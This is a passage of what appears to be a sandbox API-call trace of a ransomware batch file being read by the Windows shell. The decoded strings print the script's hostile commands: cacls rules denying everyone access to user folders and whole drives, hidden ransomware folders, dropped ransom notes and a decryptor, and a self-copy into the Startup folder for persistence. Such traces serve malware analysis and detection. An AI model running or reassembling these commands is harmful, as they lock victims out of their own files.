lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.593] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=926, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0146.593] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Searches\\*.*\" /e /d everyone\r\n\n") returned 64 [0146.593] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0146.593] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.593] GetFileType (hFile=0x2ec) returned 0x1 [0146.593] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0146.593] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.593] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=988, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0146.593] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=62, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Videos\\*.*\" /e /d everyone\r\n\r\n") returned 62 [0146.593] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0146.593] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.593] GetFileType (hFile=0x2ec) returned 0x1 [0146.593] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0146.593] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.593] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1052, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0146.593] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" /e /d everyone\r\n") returned 64 [0146.593] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0146.593] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.593] GetFileType (hFile=0x2ec) returned 0x1 [0146.593] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0146.593] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.594] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1103, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0146.594] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\Public\\*.*\" /e /d everyone\r\n/d everyone\r\n") returned 51 [0146.594] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0146.594] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.594] GetFileType (hFile=0x2ec) returned 0x1 [0146.594] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0146.594] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.594] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1155, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0146.594] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=52, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Program Files\\*.*\" /e /d everyone\r\nd everyone\r\n") returned 52 [0146.594] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0146.594] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.594] GetFileType (hFile=0x2ec) returned 0x1 [0146.594] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0146.594] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.594] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1193, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0146.594] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\*.*\" /e /d everyone\r\n /d everyone\r\n") returned 38 [0146.594] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0146.594] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.594] GetFileType (hFile=0x2ec) returned 0x1 [0146.594] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0146.594] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.594] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1231, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0146.594] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"D:\\*.*\" /e /d everyone\r\n") returned 38 [0146.594] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0146.595] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.595] GetFileType (hFile=0x2ec) returned 0x1 [0146.595] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0146.595] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.595] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1269, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0146.595] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"E:\\*.*\" /e /d everyone\r\n") returned 38 [0146.595] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0146.595] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.595] GetFileType (hFile=0x2ec) returned 0x1 [0146.595] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0146.595] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.595] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1307, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0146.595] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"F:\\*.*\" /e /d everyone\r\n") returned 38 [0146.595] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0146.595] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.595] GetFileType (hFile=0x2ec) returned 0x1 [0146.595] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0146.595] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.595] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1315, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0146.595] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 3\r\nacls \"F:\\*.*\" /e /d everyone\r\n") returned 8 [0146.595] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0146.595] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.595] GetFileType (hFile=0x2ec) returned 0x1 [0146.595] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0146.596] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.596] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1317, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0146.596] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 3\r\n") returned 2 [0146.596] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0146.596] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.596] GetFileType (hFile=0x2ec) returned 0x1 [0146.596] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0146.596] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.596] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1321, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0146.596] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":3\r\n 3\r\n") returned 4 [0146.596] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0146.596] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.596] GetFileType (hFile=0x2ec) returned 0x1 [0146.596] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0146.596] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.596] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1342, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0146.596] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRSRAMSOMWARE\r\n /e /d everyone\r\n") returned 21 [0146.596] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0146.596] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.596] GetFileType (hFile=0x2ec) returned 0x1 [0146.596] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0146.596] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.597] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1379, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0146.597] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRSRAMSOMWARE\r\n\n") returned 37 [0146.597] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0146.597] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.597] GetFileType (hFile=0x2ec) returned 0x1 [0146.597] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0146.597] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.597] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1395, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0146.597] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=16, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRS_TEMP\r\n+r C:\\FRSRAMSOMWARE\r\n") returned 16 [0146.597] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0146.597] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.597] GetFileType (hFile=0x2ec) returned 0x1 [0146.597] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0146.597] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.597] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1427, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0146.597] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRS_TEMP\r\nARE\r\n") returned 32 [0146.597] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0146.597] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.597] GetFileType (hFile=0x2ec) returned 0x1 [0146.597] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0146.597] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.597] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1462, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0146.597] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo.encrypt>C:\\FRS_TEMP\\temp.txt\r\n\r\n") returned 35 [0146.597] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0146.598] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.598] GetFileType (hFile=0x2ec) returned 0x1 [0146.598] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0146.598] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.598] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1542, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0146.598] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=80, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\Users\\%username%\\Desktop\\FRS_Decryptor.exe\r\npng\r\n") returned 80 [0146.598] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0146.598] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.598] GetFileType (hFile=0x2ec) returned 0x1 [0146.598] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0146.598] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.598] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1626, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0146.598] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.png\r\n\n") returned 84 [0146.598] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0146.598] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.598] GetFileType (hFile=0x2ec) returned 0x1 [0146.598] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0146.598] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.598] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1710, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0146.598] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.txt\r\n") returned 84 [0146.598] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0146.598] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.598] GetFileType (hFile=0x2ec) returned 0x1 [0146.598] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0146.598] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.599] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1806, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0146.599] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=96, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n\n") returned 96 [0146.599] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0146.599] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.599] GetFileType (hFile=0x2ec) returned 0x1 [0146.599] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0146.599] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.599] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1840, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0146.599] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=34, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 C:\\FRSRAMSOMWARE\\FRS.exe\r\nag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n") returned 34 [0146.599] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0146.599] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.599] GetFileType (hFile=0x2ec) returned 0x1 [0146.599] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0146.599] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.599] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1937, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0146.599] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=97, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 \"C:\\Users\\FIFCOM\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\FRS.exe\"\r\n") returned 97 [0146.599] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0146.599] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.599] GetFileType (hFile=0x2ec) returned 0x1 [0146.599] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0146.599] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, 